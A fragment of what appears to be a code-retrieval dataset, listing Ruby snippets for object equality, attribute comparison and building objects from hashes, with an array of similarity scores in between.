"def test_equality_simple\n value1_ = ::Versionomy.create(:major => 2, :minor => 0, :release_type => :alpha, :alpha_version => 5)\n value2_ = ::Versionomy.create(:major => 2, :release_type => :alpha, :alpha_version => 5)\n assert_equal(value2_, value1_)\n assert_equal(value2_.hash, value1_.hash)\n end",
"def ==(other)\n other.is_a?(self.class) &&\n name == other.name &&\n attributes == other.attributes\n end",
"def changes(attrs1, attrs2)\n old_attrs = attrs1.slice(*GENERATED_ATTRS)\n new_attrs = attrs2.slice(*GENERATED_ATTRS)\n\n return if old_attrs == new_attrs\n old_attrs.each do |k, v|\n next if new_attrs[k] == v\n @changes << Change.new(nil, k, v, new_attrs[k]) \n end\n end",
"def tdiff_equal(node)\n if (self.class == node.class)\n case node\n when Nokogiri::XML::Attr\n (self.name == node.name && self.value == node.value)\n when Nokogiri::XML::Element, Nokogiri::XML::DTD\n self.name == node.name\n when Nokogiri::XML::Text, Nokogiri::XML::Comment\n self.text == node.text\n when Nokogiri::XML::ProcessingInstruction\n (self.name == node.name && self.content = self.content)\n else\n false\n end\n else\n false\n end\n end",
"def ==(other)\n name == other.name &&\n color == other.color &&\n age == other.age\n end",
"def more_desirable?(attribute_id1, attribute_id2)\n attribute_id1 < attribute_id2\n end",
"def isSame(tab)\n for x in 0..3\n for y in 0..3\n return(false) if (self.val(x,y) != tab.val(x,y)) ;\n end\n end\n return true ;\n end",
"def ==(other)\n # If the classes don't match, they cannot possibly be equal.\n if self.class != other.class\n return false\n end\n\n # If the persisted state doesn't match, they also can never be equal.\n if persisted? != other.persisted?\n return false\n end\n\n # When persisted, check the other's id to see if it's the same,\n # cannot possible be equals if they have different ids.\n if persisted? && id != other.id\n return false\n end\n\n # Finally, compare the attributes hash. If all key/values match,\n # they are considered equal.\n attributes == other.attributes\n end",
"def ==(other)\n self.class == other.class &&\n attributes[\"_id\"] == other.attributes[\"_id\"]\n end",
"def assert_same_values(expected, actual)\n actual.each_pair do |k,v|\n next unless expected[k]\n assert_equal expected[k], v, \"Values for #{k} are not matching\"\n end\n end",
"def assert_equivalent_xml(expected, actual)\n expected_xml = Nokogiri::XML(\"<test-xml>\\n#{expected}\\n</test-xml>\")\n actual_xml = Nokogiri::XML(\"<test-xml>\\n#{actual}\\n</test-xml>\")\n ignored_attributes = %w(style data-disable-with)\n\n equivalent = EquivalentXml.equivalent?(expected_xml, actual_xml, {\n ignore_attr_values: ignored_attributes\n }) do |a, b, result|\n if result === false && b.is_a?(Nokogiri::XML::Element)\n if b.attr('name') == 'utf8'\n # Handle wrapped utf8 hidden field for Rails 4.2+\n result = EquivalentXml.equivalent?(a.child, b)\n end\n if b.delete('data-disable-with')\n # Remove data-disable-with for Rails 5+\n # Workaround because ignoring in EquivalentXml doesn't work\n result = EquivalentXml.equivalent?(a, b)\n end\n if a.attr('type') == 'datetime' && b.attr('type') == 'datetime-local'\n a.delete('type')\n b.delete('type')\n # Handle new datetime type for Rails 5+\n result = EquivalentXml.equivalent?(a, b)\n end\n end\n result\n end\n\n assert equivalent, lambda {\n # using a lambda because diffing is expensive\n Diffy::Diff.new(\n sort_attributes(expected_xml.root),\n sort_attributes(actual_xml.root)\n ).to_s(:color)\n }\n end",
"def sync_duplicate_obj_attributes(obj1, obj2)\n duplicate_keys.each do |key|\n unless obj1[key].blank? && obj2[key].blank?\n if obj1[key].blank?\n obj1.send(\"#{key}=\", obj2[key])\n elsif obj2[key].blank?\n obj2.send(\"#{key}=\", obj1[key])\n else # Each obj has a value\n if obj1[key] != obj2[key]\n raise ArgumentError, \"#{key} attribute values on the two objects don't match: #{obj1[key]} vs #{obj2[key]}\"\n end\n end\n end\n end\n end",
"def eql?(other)\n return true if equal?(other)\n\n # two instances for different models cannot be equivalent\n return false unless other.kind_of?(model)\n\n # two instances with different keys cannot be equivalent\n return false if key != other.key\n\n # neither object has changed since loaded, so they are equivalent\n return true if repository == other.repository && !dirty? && !other.dirty?\n\n # get all the loaded and non-loaded properties that are not keys,\n # since the key comparison was performed earlier\n loaded, not_loaded = properties.select { |p| !p.key? }.partition do |property|\n attribute_loaded?(property.name) && other.attribute_loaded?(property.name)\n end\n\n # check all loaded properties, and then all unloaded properties\n (loaded + not_loaded).all? { |p| p.get(self) == p.get(other) }\n end",
"def assert_event_are_light_equal e1, e2\n return false if e1.class != e2.class\n\n [:subject, :event, :moodid,\n :mood, :music, :location, :taglist, :pickeyword,\n :preformatted, :backdated, :comments, :security, :allowmask,\n :screening,].each do |attr|\n return false if e1.send(attr) != e2.send(attr)\n end\n\n e1.compare_time(e2)\n end",
"def eql(expected)\n set_relativity(:eql, expected)\n end",
"def modified?( original )\n DATA_ATTRIBUTES.any? { |e| send( e ) != original.send( e )}\n end",
"def ==(other)\n @name == other.name && @amount == other.amount\n end",
"def ==(other)\n other.kind_of?(self.class) &&\n @name == other.name && @columns == other.columns && @unique == other.unique?\n end",
"def match_same_name_attributes(*options)\n\n options = options.extract_options!\n same_name_attributes = @from_table.columns.map(&:name) & @to_table.columns.map(&:name)\n\n if same_name_attributes\n same_name_attributes = columns_from_options(same_name_attributes, options)\n same_name_attributes.each do |same_name_attribute|\n from same_name_attribute, :to => same_name_attribute\n end\n end\n end",
"def equal_pair(key, request)\n if @event[\"required\"][key] == request[\"object_attributes\"][key] || event[\"required\"][key] == \"\"\n true\n else\n false\n end\n end",
"def assert_equal(att, value, error = [att, :not_equal])\n assert value === send(att), error\n end",
"def validate\n matched = {}\n duplicated_attributes = []\n attributes.each do |attribute|\n if matched.has_key?(attribute.name) && matched[attribute.name] == attribute.name_format\n duplicated_attributes << attribute.name unless duplicated_attributes.include?(attribute.name)\n else\n matched[attribute.name] = attribute.name_format\n end\n end\n if !duplicated_attributes.empty?\n raise ValidationError, \"An attribute with the same name and name format may only be specified once. The following attributes were specified multiple times: #{duplicated_attributes.join(',')}\"\n end\n end"
] |
[
"0.7291717",
"0.7188103",
"0.70395297",
"0.7007927",
"0.68874705",
"0.6861532",
"0.6707156",
"0.6660597",
"0.66147524",
"0.658478",
"0.6584619",
"0.6580019",
"0.65543133",
"0.6543933",
"0.65068495",
"0.6479513",
"0.6456241",
"0.6415999",
"0.6412208",
"0.6412208",
"0.6412208",
"0.6411266",
"0.6380575",
"0.63775986",
"0.6260147",
"0.6246534",
"0.6240681",
"0.62150854",
"0.62014365",
"0.6186426",
"0.61837834",
"0.6164858",
"0.61304426",
"0.61149454",
"0.6097789",
"0.6083095",
"0.6078927",
"0.6067201",
"0.60053444",
"0.59974694",
"0.5994989",
"0.5991373",
"0.59856457",
"0.5985243",
"0.5977118",
"0.59521115",
"0.59428704",
"0.59311265",
"0.59247756",
"0.5921222",
"0.5921222",
"0.59095234",
"0.58795947",
"0.58789194",
"0.5870439",
"0.58598673",
"0.58571184",
"0.5856412",
"0.5855177",
"0.58480394",
"0.5847516",
"0.58370507",
"0.5799985",
"0.5795313",
"0.57880926",
"0.57823527",
"0.57788265",
"0.5776185",
"0.57670164",
"0.5759791",
"0.5758563",
"0.5753949",
"0.57518554",
"0.5750137",
"0.57385117",
"0.57309806",
"0.5729126",
"0.572618",
"0.57250285",
"0.57210624",
"0.5712646",
"0.5710082",
"0.57059866",
"0.57036847",
"0.5702592",
"0.5690256",
"0.5674193",
"0.56433815",
"0.5641553",
"0.56216776",
"0.56148046",
"0.5591313",
"0.5587681",
"0.55836356",
"0.5569298",
"0.5550885",
"0.5546161",
"0.5545665",
"0.55422115",
"0.5539372",
"0.5529004"
] |
0.0
|
-1
|
Calculates hash code according to all attributes.
|
def hash
[year, make, model, trim, short_trim, body_type, body_subtype, vehicle_type, transmission, drivetrain, fuel_type, engine, engine_size, engine_block, doors, cylinders, made_in, steering_type, antibrake_sys, tank_size, overall_height, overall_length, overall_width, std_seating, opt_seating, highway_miles, city_miles, engine_measure, engine_aspiration, trim_r].hash
end
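A minimal usage sketch (the VehicleTrim class and its keyword constructor are hypothetical stand-ins for a model exposing the attributes above): since hash is derived from the full attribute array, two instances with identical attribute values produce the same hash code.

a = VehicleTrim.new(year: 2020, make: 'Honda', model: 'Civic') # hypothetical model class
b = VehicleTrim.new(year: 2020, make: 'Honda', model: 'Civic')
a.hash == b.hash   # => true, both hashes derive from the same attribute values
{ a => 1 }.key?(b) # => true only if eql? compares the same attributes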
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def attr_hash\n Digest::MD5.hexdigest(\"#{@name}:#{@ruby_type}\")\n end",
"def hash() end",
"def hash() end",
"def hash() end",
"def hash() end",
"def hash() end",
"def hash() end",
"def hash() end",
"def hash\n code = 17\n code = 37*code + @x.hash\n code = 37*code + @y.hash\n # Add lines like this for each significant instance variable\n code # Return the resulting code\n end",
"def hash(*) end",
"def hash\n code = 17\n code = 37 * code\n self.instance_variables.each do |v|\n code += self.instance_variable_get(v).hash\n end\n code\n end",
"def hash_code; end",
"def calculate_hash!\n prefix = PREFIX_NAME_LOOKUP[self.type]\n # add special cases for refs\n self.hash_id = NodeId.sha1(\"#{prefix} #{self.size}\\0#{self.content}\")\n end",
"def hash() #:nodoc:\n prime = 31;\n result = 1;\n result = prime * result + @amount.to_i\n result = prime * result + @new_balance.to_i\n result = prime * result + (@date.nil? ? 0 : Bankjob.date_time_to_ofx(@date).hash);\n result = prime * result + (@raw_description.nil? ? 0 : @raw_description.hash);\n result = prime * result + (@type.nil? ? 0 : @type.hash);\n # don't use value date\n return result;\n end",
"def hash\n prime = 31\n result = 1\n result = result * prime + (@decision_target == nil ? 0 : @decision_target.hash)\n result = prime * result + (@string_id == nil ? 0 : @string_id.hash)\n result\n end",
"def hash\n @hash ||= begin\n result = 17\n result = 31 * result + self.class.hash\n result = 31 * result + ord\n result.is_a?(Fixnum) ? result : result.hash\n end\n end",
"def hash\n @hash ||= begin\n result = 17\n result = 31 * result + self.class.hash\n result = 31 * result + ord\n result.is_a?(Fixnum) ? result : result.hash\n end\n end",
"def hash; map{|el| \"#{el.name} @ #{el.hash}\"}; map(&:hash).reduce(:+) % 2**32; end",
"def hash\r\n a = 0\r\n @id.each_byte {|c| a += c.to_i}\r\n (a + @paired.to_i) * HASH_PRIME\r\n end",
"def hash\n raw = [name, type, values.join('/')].join(' ')\n Digest::MD5.hexdigest(raw)\n end",
"def hash\n size.hash ^ rank.hash\n end",
"def hash\n \"#{self.class.name}-#{self.id}-#{@__metadata__.cas}-#{@__attributes__.hash}\".hash\n end",
"def hash\n @hash || calculate_hash!\n end",
"def hash\n return name.hash ^ direction.hash ^ lhs.hash ^ rhs.hash\n end",
"def hash\n value = 0\n my_rows = @rows\n r_size = my_rows.size\n for i in 0..r_size-1 do\n a_row = my_rows[i]\n a_size = a_row.size\n for j in 0..a_size-1 do\n value ^= a_row[j].hash\n end\n end\n return value\n end",
"def hash\n id.hash + 32 * bs_request.hash\n end",
"def do_hash(input)\n a = OpenSSL::Digest.hexdigest(\"SHA224\", input).to_i % 19\n b = OpenSSL::Digest.hexdigest(\"SHA512\", input).to_i % 19\n [a, b]\n end",
"def hash\n type.hash ^ (id.hash >> 1)\n end",
"def hash\n [self.class, self.val, self.attribute].hash\n end",
"def hash\n 0\n end",
"def hash # :nodoc:\n identifier.hash ^ requirement.hash\n end",
"def hash\n self.class.hash ^ key_attributes.hash\n end",
"def hash\n return super unless has_size?\n\n res = 0\n each do |el|\n res += el.hash\n end\n return res\n end",
"def hash\n h = @e.nil? ? 0 : @e\n h = (h << 1) ^ @r.hash\n h = (h << 1) ^ @v.hash\n end",
"def hash() source.hash ^ (target.hash+1); end",
"def hash() source.hash ^ (target.hash+1); end",
"def hash\n\t\t\"#{@x}#{@y}\".hash\n\tend",
"def hash #:nodoc:\n __getobj__.hash ^ self.class.hash\n end",
"def hash\n Zlib.crc32(to_a.map(&:to_s).sort.to_s)\n end",
"def hash_code\n prime = 31\n result = 1\n result = prime * result + x\n result = prime * result + y\n return result;\n end",
"def hash\n self.class.hash ^ operand.hash\n end",
"def hash!\n\t\t@@email.downcase!\n\t\thash = Digest::MD5.hexdigest(@@email)\n\t\treturn hash\n\tend",
"def hash\n [anchor, cv, nullifier, proof, rk, spend_auth_sig].hash\n end",
"def hash\n ([self.class] + self.class.comparison_attrs.map{|x| send(x)}).hash\n end",
"def hash\n @symbols.hash + 37*positive?.hash\n end",
"def calculate_unique_hash\n unique = ''\n unique += self.content if self.content.present?\n unique += self.summary if self.summary.present?\n unique += self.title if self.title.present?\n self.unique_hash = Digest::MD5.hexdigest unique\n end",
"def hash()\n #This is a stub, used for indexing\n end",
"def hash\n # Memoizing such a simple hash value seems silly, however the\n # profiler showed the Card#hash method as having 22% of the runtime. My\n # memoizing the hash value that was reduced to 12%.\n return @hash unless @hash.nil?\n @hash = @value.hash ^ @suit.hash\n end",
"def hash=(_arg0); end",
"def block_hash\n\t\tdigest = Digest::SHA2.new\n\n\t\tdigest << '%d' % [ self.index ]\n\t\tdigest << self.timestamp.strftime( '%s%N' )\n\t\tdigest << self.payload\n\t\tdigest << self.payload_hash\n\t\tdigest << self.proof.to_s\n\t\tdigest << self.previous_hash\n\t\t\n\t\treturn digest.hexdigest\n\tend",
"def hash\n num = 0\n self.each do |k,v|\n if k.is_a?(Integer) && v.is_a?(Integer)\n num += k * 26 + v\n elsif k.is_a?(Integer) && !v.is_a?(Integer)\n num += k * 26 + ALPHA_NUMBERS[v.to_s.downcase]\n elsif v.is_a?(Integer) && !k.is_a?(Integer)\n num += v * 26 + ALPHA_NUMBERS[k.to_s.downcase]\n elsif !k.nil? && !v.nil?\n num += ALPHA_NUMBERS[k.to_s.downcase] * ALPHA_NUMBERS[v.to_s.downcase]\n end\n end\n num\n end",
"def hash\r\n\t\treturn @name.hash() + @type.hash()\r\n\tend",
"def hash\n return @hash_code if defined? @hash_code\n @hash_code = usual_equal_object.hash\n end",
"def hash; end",
"def hash; end",
"def hash; end",
"def hash; end",
"def hash; end",
"def hash; end",
"def hash; end",
"def hash; end",
"def hash; end",
"def hash; end",
"def hash\n [oct, pc].hash\n end",
"def hash\n excl = @excl ? 1 : 0\n hash = excl\n hash ^= @begin.hash << 1\n hash ^= @end.hash << 9\n hash ^= excl << 24;\n # Are we throwing away too much here for a good hash value distribution?\n return hash & Fixnum::MAX\n end",
"def hash\n code.hash\n end",
"def hash # :nodoc:\n name.hash ^ type.hash ^ requirement.hash\n end",
"def hash\n @vbits.hash\n end",
"def hash\n Digest::SHA256.hexdigest( \"#{nonce}#{time}#{difficulty}#{prev}#{data}\" )\n end",
"def hash\n if @sha512hash != nil\n return @sha512hash.to_i(16)\n else\n super\n end\n end",
"def calc_hash(pass)\n salt_cost = SCrypt::Engine.autodetect_cost(self[:salt])\n SCrypt::Engine.scrypt(pass, self[:salt], salt_cost, 32).unpack('H*').first\n end",
"def hash\n [lac, cid, radio, mcc, mnc, signal, psc, asu, ta].hash\n end",
"def calculate_checksum\n last_checksum = previous_event&.checksum\n attrs = attributes.except(\"checksum\", \"id\", \"updated_at\").merge(last_checksum: last_checksum)\n cs = Digest::SHA256.hexdigest(attrs.to_s)\n puts \"#{id} calculate_checksum: #{cs} <- #{attrs} \" if Rails.env.development?\n Rails.logger.info(\"#{id} calculate_checksum: #{cs} <- #{attrs} \")\n return cs\n end",
"def hash\n code.hash\n end",
"def hash\n\t\t[@a, @b, self.class::D].hash\n\tend",
"def consistent_hash\n Zlib.crc32(self.to_yaml, 0)\n end",
"def hash\n @hash[:perm_type].hash ^\n @hash[:perms].hash ^\n @hash[:inheritance].hash ^\n @hash[:target].hash\n end",
"def hash( *strs )\n return Digest::MD5.hexdigest( strs.join )\n end",
"def hash\n @rank.hash ^ @suit.hash\n end",
"def hash\n return Digest::MD5.hexdigest(self.describe(' '))\n end",
"def hash\n @real.hash ^ @image.hash\n end",
"def to_hash() end",
"def hash_length\n super\n end",
"def hash_hash(h)\n require 'digest/md5'\n Digest::MD5.hexdigest(Marshal::dump(h.sort))\n end",
"def hash() source.hash ^ target.hash; end",
"def hash\n [first_name, last_name, address_one, address_two, city, state, zip, phone, email, country_code].hash\n end",
"def calculate_hash(input, prep_hashes)\n result = 0\n input.unpack('U*').each do |x|\n result += prep_hashes.hash(x)\n end\n (result % MOD_VALUE).to_s(HEX)\nend",
"def c_hash\n sha256 = Digest::SHA256.new\n token = @code.token.token\n hashed_token = sha256.digest(token)\n first_half = hashed_token[0...hashed_token.length / 2]\n Base64.urlsafe_encode64(first_half).tr('=', '')\n end",
"def hash(block)\n Digest::SHA256.hexdigest(block.to_s.encode)\n end",
"def calculate_hash\n\t\toptions = {:firstname => firstname, :email => email, :phone => phone, :txnid => txnid, :surl => surl, :furl => furl, :productinfo => productinfo, :amount => amount}\n\t\tservice = PayuIndia::Helper.new(payment_gateway_key, payment_gateway_salt, options)\n\t\tself.hast = service.generate_checksum\n\tend",
"def hash\n [rank, suit].hash\n end",
"def hash\n self.class.hash ^ left.hash ^ right.hash\n end",
"def generate_hash(*args)\n Digest::SHA3.hexdigest(args.join(''))\n end",
"def hash_code\n hash_code = {}\n self.seq.each do |letter|\n hash_code.keys.include?(letter) ? hash_code[letter] += 1 : hash_code[letter] = 1\n end\n hash_code\n end",
"def hashify_attributes(attrs)\n Hash.new.tap{ |h| attrs.each{|a| h[a] = self.send(a)} }\n end",
"def hash\n\n self.h.fei.hash\n end",
"def hash\n shasum.hash\n end",
"def hash\n shasum.hash\n end",
"def hash\n shasum.hash\n end",
"def hash\n attributes.hash\n end",
"def hash\n attributes.hash\n end"
] |
[
"0.7118691",
"0.70400536",
"0.70400536",
"0.70400536",
"0.70400536",
"0.70400536",
"0.70400536",
"0.70400536",
"0.68960655",
"0.67847186",
"0.6707762",
"0.670052",
"0.6688737",
"0.66705376",
"0.6489735",
"0.6462376",
"0.6462376",
"0.64444333",
"0.6413127",
"0.6395483",
"0.63898623",
"0.6372129",
"0.635671",
"0.63370055",
"0.62682766",
"0.62533766",
"0.6246914",
"0.6230963",
"0.62173444",
"0.6214272",
"0.6214131",
"0.61962456",
"0.619165",
"0.61866295",
"0.6185355",
"0.6185355",
"0.6153702",
"0.6145376",
"0.6144877",
"0.6139152",
"0.6128312",
"0.61224943",
"0.61217207",
"0.61205214",
"0.61041045",
"0.61000645",
"0.60937095",
"0.60931146",
"0.60818595",
"0.60811466",
"0.60500103",
"0.60322344",
"0.6022704",
"0.6020012",
"0.6020012",
"0.6020012",
"0.6020012",
"0.6020012",
"0.6020012",
"0.6020012",
"0.6020012",
"0.6020012",
"0.6020012",
"0.60178953",
"0.6014942",
"0.5997442",
"0.59880185",
"0.598736",
"0.59799886",
"0.5972682",
"0.5969595",
"0.5969411",
"0.59594935",
"0.5957466",
"0.59423596",
"0.5942144",
"0.59245354",
"0.5924357",
"0.5904946",
"0.59025365",
"0.58536685",
"0.5847055",
"0.58454466",
"0.5845053",
"0.58447546",
"0.5844059",
"0.5842638",
"0.5840575",
"0.58391696",
"0.5825819",
"0.5824118",
"0.5823615",
"0.58184344",
"0.5815284",
"0.58124787",
"0.5810309",
"0.5808056",
"0.5808056",
"0.5808056",
"0.5806852",
"0.5806852"
] |
0.0
|
-1
|
Builds the object from hash
|
def build_from_hash(attributes)
return nil unless attributes.is_a?(Hash)
self.class.swagger_types.each_pair do |key, type|
if type =~ /\AArray<(.*)>/i
      # check to ensure the input is an array, given that the attribute
      # is documented as an array but the input is not
if attributes[self.class.attribute_map[key]].is_a?(Array)
self.send("#{key}=", attributes[self.class.attribute_map[key]].map { |v| _deserialize($1, v) })
end
elsif !attributes[self.class.attribute_map[key]].nil?
self.send("#{key}=", _deserialize(type, attributes[self.class.attribute_map[key]]))
    end # else: data not found in the attributes hash; not an issue, as the data can be optional
end
self
end
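A hedged round-trip sketch (Listing, its price field, and the payload keys are hypothetical; any Swagger-generated model with attribute_map and swagger_types behaves the same way):

payload = { 'price' => 19999, 'vin' => '1HGCM82633A004352' }
listing = Listing.new.build_from_hash(payload) # hypothetical generated model
listing.price # => 19999; keys absent from the payload are simply left nil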
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def build(hash)\n obj = new\n hash.each_pair do |k,v|\n obj[k] = v if variables[k]\n end\n return obj\n end",
"def build_from_hash(attributes)\n\n end",
"def build_from_hash(hash)\n instance = self.new\n\n # Add the instance attributes dynamically from the hash. If the attribute\n # does not already exist, then don't re-add the attribute class and\n # variable, just set it with the value from the hash\n hash.keys.each do |key|\n class_eval { attr_accessor key } unless instance.methods.include?(key.to_sym)\n instance.instance_variable_set \"@#{key}\", hash[key]\n end\n\n instance\n end",
"def build(hash, track_changes = true)\n resource = fields.each_with_object(new) do |field, r|\n value = hash.fetch(field.to_s, hash[field.to_sym])\n r.send(\"#{field}=\", value)\n end\n resource.clear_changes! unless track_changes\n resource\n end",
"def initialize hash\n @hash = hash\n end",
"def build(params)\n return new(params) if params.is_a?(Hash)\n raise(\"unexpected parameter, expected Hash, received #{params.class}\")\n end",
"def initialize( hash )\n\t\t\t@hash = hash.dup\n\t\t\t@dirty = false\n\t\tend",
"def initialize(a_hash)\n from_h(a_hash)\n end",
"def initialize\n\t\t\t@hash = {}\n\t\tend",
"def initialize(hash)\n @hash = hash\n @converted = {}\n end",
"def initialize(hash)\n @short_code = hash[\"short_code\"]\n @name = hash[\"name\"]\n @id = hash[\"id\"]\n end",
"def initialize(hash)\n super(hash)\n end",
"def initialize\n @h = new_hash\n end",
"def new_from_hash(hash)\n if hash == nil\n self.class.new.assign(self)\n else\n hash_obj = hash\n if hash.instance_of?(Hash)\n hash_obj = self.class.new\n merge_hash_into_object(hash, hash_obj)\n end\n instance = self.class.new\n object_assign(instance, hash_obj)\n end\n end",
"def initialize(hash={})\n @hash = hash\n end",
"def initialize\n @hash = {}\n end",
"def initialize\n @hash = {}\n end",
"def initialize(hash)\r\n hash.each { |k, v|\r\n # Create getters and setters\r\n self.class.attr_accessor(k)\r\n # Set value for created variable\r\n self.send(\"#{k}=\", v)\r\n }\r\n self.class.all.push(self)\r\n end",
"def build!(hash)\n hash.must(::Hash) { raise ArgumentError, \"#{self} expects Hash, but got #{hash.class}\" }\n\n if hash.size != variables.size\n keys1 = variables.keys\n keys2 = hash.keys.map(&:to_s)\n minus = (keys1 - keys2).map{|i| \"-#{i}\"}\n plus = (keys2 - keys1).map{|i| \"+#{i}\"}\n \n msg = \"#{self} expects #{variables.size}, but got #{hash.size} (%s)\" % (minus + plus).join(\",\")\n raise Typed::SizeMismatch, msg\n end\n\n # 'build' just ignore unknown fields, but 'build!' raise errors\n obj = new\n hash.each_pair do |k,v|\n obj[k] = v\n end\n return obj\n end",
"def initialize(hash)\n @cw_id = hash[\"cw_id\"]\n @cik = hash[\"cik\"]\n @name = hash[\"company_name\"]\n @irs_number = hash[\"irs_number\"]\n @sic_code = hash[\"sic_code\"]\n @industry = hash[\"industry_name\"]\n @sic_sector = hash[\"sic_sector\"]\n @sector_name = hash[\"sector_name\"]\n @source_type = hash[\"source_type\"]\n @address = hash[\"raw_address\"]\n @country = hash[\"country_code\"]\n @state = hash[\"subdiv_code\"]\n @top_parent_id = hash[\"top_parent_id\"]\n @num_parents = hash[\"num_parents\"]\n @num_children = hash[\"num_children\"]\n @max_year = hash[\"max_year\"]\n @min_year = hash[\"min_year\"]\n end",
"def from_hash(hash)\n instance = allocate\n instance.instance_variable_set :@attributes, hash.freeze\n instance\n end",
"def from_hash(hash)\n hash = DEFAULTS.merge(hash)\n hash['spdx_id'] = hash.delete('spdx-id')\n ordered_array = hash.values_at(*members.map(&:to_s))\n new(*ordered_array)\n end",
"def initialize(hash=nil)\n @table = HashWithIndifferentAccess.new\n\n for k,v in hash\n @table[k] = v\n new_ostruct_member(k)\n end if hash\n end",
"def from_hash(hash)\n hash.each_pair do |key, value|\n\n # We need to catch hashes representing child objects\n # If the hash key:value is a of a Hash/BSON:Ordered hash\n if hash[key].class == Hash || hash[key].class == BSON::OrderedHash\n # If we have a classname we know we need to return to an object\n if hash[key][\"@classname\"]\n self.instance_variable_set(key, ::Object::full_const_get(hash[key][\"@classname\"]).new(hash[key])) unless key.to_s.start_with?(\"_\")\n else\n self.instance_variable_set(key, value) unless key.to_s.start_with?(\"_\")\n end\n else\n self.instance_variable_set(key, value) unless key.to_s.start_with?(\"_\")\n end\n end\n end",
"def from_hash(hash)\n hash.each_pair do |key, value|\n\n # We need to catch hashes representing child objects\n # If the hash key:value is a of a Hash/BSON:Ordered hash\n if hash[key].class == Hash || hash[key].class == BSON::OrderedHash\n # If we have a classname we know we need to return to an object\n if hash[key][\"@classname\"]\n self.instance_variable_set(key, ::Object::full_const_get(hash[key][\"@classname\"]).new(hash[key])) unless key.to_s.start_with?(\"_\")\n else\n self.instance_variable_set(key, value) unless key.to_s.start_with?(\"_\")\n end\n else\n self.instance_variable_set(key, value) unless key.to_s.start_with?(\"_\")\n end\n end\n end",
"def initialize(hash)\n @hash = hash\n @data = resourcify_data\n end",
"def from_hash hash\n @id= hash['id']\n\n @admin= hash['admin']\n @username= hash['username']\n @timezone= hash['timezone']\n @email_address= hash['email_address']\n\n @password = nil\n\n @created_at= DateTime.parse(hash['created_at'])\n @updated_at= DateTime.parse(hash['updated_at'])\n end",
"def hash_to_obj hash\n OpenStruct.new(hash) rescue raise ConfigError, \"Can't convert setup to object\"\n end",
"def initialize(hash)\n load_hash(hash)\n end",
"def from_hash( h)\n\t\th.each { |name,attributes|\n\t\t\tklass = Klass.new\n\t\t\tklass.from_hash( { name => attributes } )\n\t\t\tself.add_class( klass)\n\t\t}\n\n\t\t# this is an experiment in handling \"through\" attributes\n\t\t# i.e. enriching the model with the join classes\n\tend",
"def initialize(*args)\n super\n # hash = {}\n end",
"def build_object(resp)\n return resp unless resp.respond_to?(:merge)\n @build_object ||= final_object_class.new(resp.merge(additional_hash_to_serialize_after_response))\n end",
"def from_hash(hash)\n ordered_array = hash.values_at(*members.map(&:to_s))\n new(*ordered_array)\n end",
"def __convert hash #:nodoc:\n instance = self.class.new\n hash.each do |k, v|\n k = k.to_s if !k.respond_to?(:to_sym) && k.respond_to?(:to_s)\n instance.new_ostruct_member k\n if v.is_a?(Hash)\n v = v[\"type\"] == \"hash\" ? v[\"contents\"] : __convert(v)\n elsif v.is_a?(Array)\n v = v.map{|e| e.instance_of?(Hash) ? __convert(e) : e}\n end\n instance.send \"#{k}=\".to_sym, v\n end\n instance\n end",
"def initialize(hash)\n\t\t@id = hash['id']\n\t\t@first_name = hash['first_name']\n\t\t@last_name = hash['last_name']\n\t\t@mentor = hash['mentor']\n\tend",
"def initialize(hash={})\n @name = validate_name(hash[:name])\n @description = hash[:description]\n @snmp_opts = hash[:snmp_opts]\n\n save # Save a copy of self to Redis on creation\n end",
"def initialize\n @hash_dict = {}\n end",
"def initialize(hash=nil)\n @attributes = hash\n @attributes ||= {}\n end",
"def initialize(hash={})\n self.init_attrs_from_hash(hash)\n end",
"def from_hash(hash)\n apply_nested_hash(hash)\n end",
"def initialize(hash)\n # @id = hash[\"id\"]\n # @street_address = hash[\"street_address\"]\n # @city = hash[\"city\"]\n # @state = hash[\"state\"]\n # @zipcode = hash[\"zipcode\"]\n # @country = hash[\"country\"]\n\n #add in correct details\n end",
"def from_hash(hash)\n @data_object.user_acc_name = hash['user_acc_name']\n @data_object.user_affiliate = hash['user_affiliate']\n @user_over_13 = hash['user_over_13']\n\n contact.from_hash(hash)\n end",
"def initialize(hash)\n @name = hash[\"campaign\"] #decided to change it to \"name\" since this is the campaign class\n date_elements = hash[\"date\"].split(\"/\") #date is being passed in as a string, need this array to create the Date object in the next line\n @date = Date.new(date_elements[2].to_i + 2000, date_elements[0].to_i, date_elements[1].to_i) #added 2000 to year since the program was considering it as the year 15; this creates the date object\n @spend = hash[\"spend\"].to_f #use .to_f to make sure spend comes in as a float instead of a string\n @impressions = hash[\"impressions\"].to_i #need it as an integer for counting purposes later\n @actions = JSON.parse(hash[\"actions\"])#ensures that each action comes in as an array instead of a string\n @@all << self #shovels it into the all array\n end",
"def initialize(hash)\n hash.each do |k, v|\n self.send(\"#{k}=\", v) if self.respond_to?(\"#{k}=\")\n end\n @id = hash[\"id\"]\n end",
"def initialize (hash)\n hash.each {|key, value|\n self.class.attr_accessor(key)\n self.send((\"#{key}=\"), value)\n }\n @@all << self\n end",
"def initialize(hash={})\n @data = Hash.new\n hash.each do |key, value|\n self[key] = value\n end\n end",
"def create_from_hash(hash, opts={})\n create_opts = update_or_create_options(hash, opts)\n create { |instance| instance.set(create_opts) }\n end",
"def initialize(hash={})\n # assign the attributes here (???)\n hash.each do |k, v| # name = id, name, etc.\n self.send(\"#{k}=\", v)\n # self.k = v # there's no '.k' method\n #binding.pry\n end\n end",
"def initialize(hash) #.new\n @name = hash[:name][0]\n @region = hash[:region]\n @population = hash[:population]\n @capital = hash[:capital]\n @flag_link = hash[:flag_link]\n @@all << self\n #binding.pry\n end",
"def initialize(hash = {})\n super(hash)\n\n @action = extract_value(hash, :action)\n @clientId = extract_value(hash, :clientId)\n @clientIdAlias = extract_value(hash, :clientIdAlias)\n @clientIdAliasUsed = extract_boolean_value(hash, :clientIdAliasUsed)\n @expiresAt = extract_integer_value(hash, :expiresAt)\n @subject = extract_value(hash, :subject)\n @scopes = extract_value(hash, :scopes)\n @existent = extract_boolean_value(hash, :existent)\n @usable = extract_boolean_value(hash, :usable)\n @sufficient = extract_boolean_value(hash, :sufficient)\n @refreshable = extract_boolean_value(hash, :refreshable)\n @responseContent = extract_value(hash, :responseContent)\n @properties = extract_array_value(hash, :scopes) do |element|\n Authlete::Model::Property.parse(element)\n end\n end",
